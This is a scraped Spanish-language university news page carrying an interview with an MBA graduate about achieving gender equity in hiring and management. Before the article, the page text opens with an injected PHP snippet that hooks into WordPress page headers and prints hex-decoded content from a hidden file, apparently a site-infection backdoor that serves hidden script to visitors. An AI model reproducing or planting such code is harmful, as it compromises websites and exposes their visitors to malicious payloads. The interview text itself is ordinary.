if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Alcanzar la equidad de género es responsabilidad de todas las áreas en una empresa – La Opinión Universitaria La Opinión Universitaria
Menu

Alcanzar la equidad de género es responsabilidad de todas las áreas en una empresa

 

Por Diego Cuautle

Tanto en economías en desarrollo y maduras, que tanto en los equipos de Recursos Humanos y en los equipos gerenciales aun libramos batallas diarias para tomar decisiones sobre para atraer y retener el mejor talento posible y que al mismo tiempo contribuyan a incrementar el balance de género, señaló Gerardo Díaz Gutiérrez, egresado de licenciatura en Psicología y del Master of Business Administration (MBA) de la Universidad de las Américas Puebla (UDLAP).

En entrevista, comentó que lograr un cambio de esa naturaleza implica no solo un compromiso organizacional desde la cúpula más alta, sino también una determinación honesta en cada uno de los líderes que forman parte de los equipos de trabajo y compañías para enfrentar diversos “momentos de verdad” día con día.

“Si pudiéramos enunciar una formula general, comenzaría por confirmar que se requiere que los equipos gerenciales clarifiquen y sostengan porqué es necesario igualar la representación de mujeres en todos los niveles, establecer un plan realista pero exigente”, comentó.

Después, dijo, se debe invertir recursos (tiempo, discusiones con mandos medios y demás líderes de opinión) para homologar el nivel de conocimiento sobre el tema, en capacitar al resto de los gerentes y líderes, extendiendo la misma percepción y necesidad de cambio a través de la organización, y finalmente entrenamiento en equidad de género para hombres y mujeres.

“Siguiendo esta línea de pensamiento, es muy importante preparar a Recursos Humanos para apoyar este cambio alineando las políticas y procesos que estarán vinculados a toma de decisiones relacionadas. Por ejemplo, el año pasado un país en desarrollo requeríamos cubrir un puesto de director para un país mediante una contratación externa”, comentó.

Destacó que el área de reclutamiento presentó 3 candidatos finalistas hombres, y este país tiene una representación de solo 20% en mandos gerenciales. El director regional pidió incluir al menos una candidata en la terna a pesar de que estos implicarían retrasar el proceso por 2 semanas. Al final la candidata demostró tener un perfil completo y se desempeñó mejor que los demás en la selección. Si él no hubiese requerido incluir una candidata, nos habríamos perdido de la oportunidad de atraer una gran candidata.

“Desde el punto de vista individual sin importar si somos hombres o mujeres, la invitación es a reflexionar si estamos garantizando igualdad de oportunidades a través de nuestras expectativas, comportamiento y decisiones”, finalizó.

No comments

Deja una respuesta

Tweets recientes